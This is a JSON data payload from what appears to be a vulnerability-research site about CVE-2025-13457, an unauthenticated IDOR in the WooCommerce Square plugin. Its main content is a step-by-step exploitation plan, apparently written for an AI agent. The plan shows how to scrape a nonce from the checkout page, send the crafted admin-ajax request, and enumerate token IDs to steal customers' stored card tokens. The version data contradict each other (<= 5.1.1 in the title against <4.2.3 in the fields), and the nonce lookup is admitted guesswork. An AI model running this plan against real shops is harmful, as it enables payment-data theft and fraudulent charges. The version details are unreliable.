[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fda-FCYWOCp-0ouqmcmmINc1ro0nnbvMHfN6JrT9bkfQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2025-13457","woocommerce-square-unauthenticated-insecure-direct-object-reference-to-sensitive-information-exposure-in-gettokenbyid","WooCommerce Square \u003C= 5.1.1 - Unauthenticated Insecure Direct Object Reference to Sensitive Information Exposure in get_token_by_id","The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id  function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square \"ccof\" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site.","woocommerce-square",null,">=4.2.0 \u003C4.2.3","4.2.3","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-01-09 14:05:48","2026-01-10 03:21:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc7f4f726-7e53-4397-8d8b-7a574326adc6?source=api-prod",1,[22,23,24],"includes\u002FGateway.php","readme.txt","woocommerce-square.php","researched",false,3,"# Exploitation Research Plan - CVE-2025-13457\n\n## 1. Vulnerability Summary\nThe WooCommerce Square plugin (versions \u003C= 5.1.1) is vulnerable to an **Insecure Direct Object Reference (IDOR)** in the `get_token_by_id` function within the `WooCommerce\\Square\\Gateway` class. The function is exposed via both authenticated and unauthenticated WordPress AJAX actions. While it performs a nonce check, it fails to verify if the requesting user has the authority to access the payment token associated with the provided `token_id`. This allows an unauthenticated attacker to retrieve sensitive Square \"ccof\" (credit card on file) tokens for any user by enumerating token IDs.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `wc_square_get_token_by_id` (Registered as `wp_ajax_nopriv_wc_square_get_token_by_id` in `includes\u002FGateway.php`)\n*   **HTTP Method:** GET\n*   **Vulnerable Parameter:** `token_id`\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** \n    1.  WooCommerce and WooCommerce Square must be active.\n    2.  At least one valid Square payment token must exist in the database (stored in `wp_woocommerce_payment_tokens`).\n    3.  A valid WordPress nonce for the action `payment_token_nonce` must be obtained.\n\n## 3. Code Flow\n1.  **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=wc_square_get_token_by_id`.\n2.  **Hook Registration:** In `includes\u002FGateway.php`, the `__construct` method registers:\n    ```php\n    add_action( 'wp_ajax_wc_' . $this->get_id() . '_get_token_by_id', array( $this, 'get_token_by_id' ) );\n    add_action( 'wp_ajax_nopriv_wc_' . $this->get_id() . '_get_token_by_id', array( $this, 'get_token_by_id' ) );\n    ```\n    (Note: `$this->get_id()` returns `square`).\n3.  **Vulnerable Function:** `get_token_by_id()` is called.\n4.  **Nonce Verification:** It retrieves the nonce from `$_GET['nonce']` and verifies it against `'payment_token_nonce'`:\n    ```php\n    if ( ! wp_verify_nonce( $nonce, 'payment_token_nonce' ) ) {\n        wp_send_json_error( ... );\n    }\n    ```\n5.  **Insecure IDOR:** It retrieves `token_id` via `$_GET['token_id']` and calls `\\WC_Payment_Tokens::get( $token_id )`.\n    ```php\n    $token_id = isset( $_GET['token_id'] ) ? absint( wp_unslash( $_GET['token_id'] ) ) : false;\n    $token_obj = \\WC_Payment_Tokens::get( $token_id );\n    ```\n6.  **Information Exposure:** Without checking the `user_id` associated with the `$token_obj`, it returns the actual Square token string:\n    ```php\n    wp_send_json_success( $token_obj->get_token() );\n    ```\n\n## 4. Nonce Acquisition Strategy\nThe `payment_token_nonce` is typically localized for the frontend to facilitate AJAX calls for managing saved cards. In WooCommerce Square, this is often localized for the checkout page or the \"My Account\" payment methods section.\n\n**Strategy:**\n1.  **Identify Localization:** Search for `payment_token_nonce` in the plugin's frontend scripts. It is likely localized via `wp_localize_script` under a variable like `wc_square_params` or `wc_square_payment_form_params`.\n2.  **Create Trigger Page:** If not visible on the homepage, the checkout page is the most reliable source for unauthenticated users.\n3.  **Execution:**\n    *   Navigate to the Checkout page (`\u002Fcheckout\u002F`).\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        \u002F\u002F Hypothetical variable name based on plugin patterns\n        window.wc_square_params?.payment_token_nonce || window.wc_square_payment_form_params?.payment_token_nonce\n        ```\n    *   If the scripts only load when the Square gateway is selected, the agent should interact with the payment method radio buttons first.\n\n## 5. Exploitation Strategy\n1.  **Preparation:** Identify a target `token_id`. Since these are autoincrement integers, the agent can start from `1` or use a likely range.\n2.  **HTTP Request:**\n    *   **Tool:** `http_request`\n    *   **URL:** `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php?action=wc_square_get_token_by_id&nonce=[NONCE]&token_id=[ID]`\n    *   **Method:** GET\n3.  **Payload:**\n    *   `action`: `wc_square_get_token_by_id`\n    *   `nonce`: The extracted `payment_token_nonce`.\n    *   `token_id`: The ID of the token to steal.\n4.  **Success Condition:** A JSON response with `success: true` containing a string starting with `ccof:` (Square Credit Card On File format).\n\n## 6. Test Data Setup\nTo verify the IDOR, we need a token belonging to a different user (e.g., an Admin or a dummy Customer).\n1.  **Create Customer:** `wp user create victim victim@example.com --role=customer`\n2.  **Create Payment Token:** Use WP-CLI to manually insert a Square token for the victim:\n    ```bash\n    wp eval '\n    $token = new WC_Payment_Token_CC();\n    $token->set_token(\"ccof:target_secret_token_123\");\n    $token->set_gateway_id(\"square\");\n    $token->set_card_type(\"visa\");\n    $token->set_last4(\"1234\");\n    $token->set_expiry_month(\"12\");\n    $token->set_expiry_year(\"2030\");\n    $token->set_user_id([VICTIM_ID]);\n    $token->save();\n    echo \"TOKEN_ID:\" . $token->get_id();\n    '\n    ```\n3.  **Enable Gateway:** Ensure Square is enabled in WooCommerce settings.\n\n## 7. Expected Results\n*   **Request:** `GET \u002Fwp-admin\u002Fadmin-ajax.php?action=wc_square_get_token_by_id&nonce=a1b2c3d4e5&token_id=[VICTIM_TOKEN_ID]`\n*   **Response:**\n    ```json\n    {\n        \"success\": true,\n        \"data\": \"ccof:target_secret_token_123\"\n    }\n    ```\n*   The unauthenticated requester successfully receives the private \"ccof\" token belonging to the victim.\n\n## 8. Verification Steps\n1.  Check the database via WP-CLI to confirm the token value matches the exposed data:\n    ```bash\n    wp db query \"SELECT token FROM wp_woocommerce_payment_tokens WHERE id = [VICTIM_TOKEN_ID]\"\n    ```\n2.  Verify the response from the AJAX call matches the `token` field from the database query.\n\n## 9. Alternative Approaches\n*   **Brute Force\u002FEnumeration:** If the specific `token_id` is unknown, loop through IDs `1-100` via a sequence of `http_request` calls.\n*   **Check Other Pages:** If the checkout page requires items in the cart to load the Square scripts, use the `http_request` tool to add a product to the cart first:\n    *   `POST \u002F?add-to-cart=[PRODUCT_ID]`\n    *   Then visit `\u002Fcheckout\u002F` to extract the nonce.","gemini-3-flash-preview","2026-05-05 12:26:12","2026-05-05 12:26:33",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","4.2.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-square\u002Ftags\u002F4.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-square.4.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-square\u002Ftags\u002F4.2.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce-square.4.2.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce-square\u002Ftags"]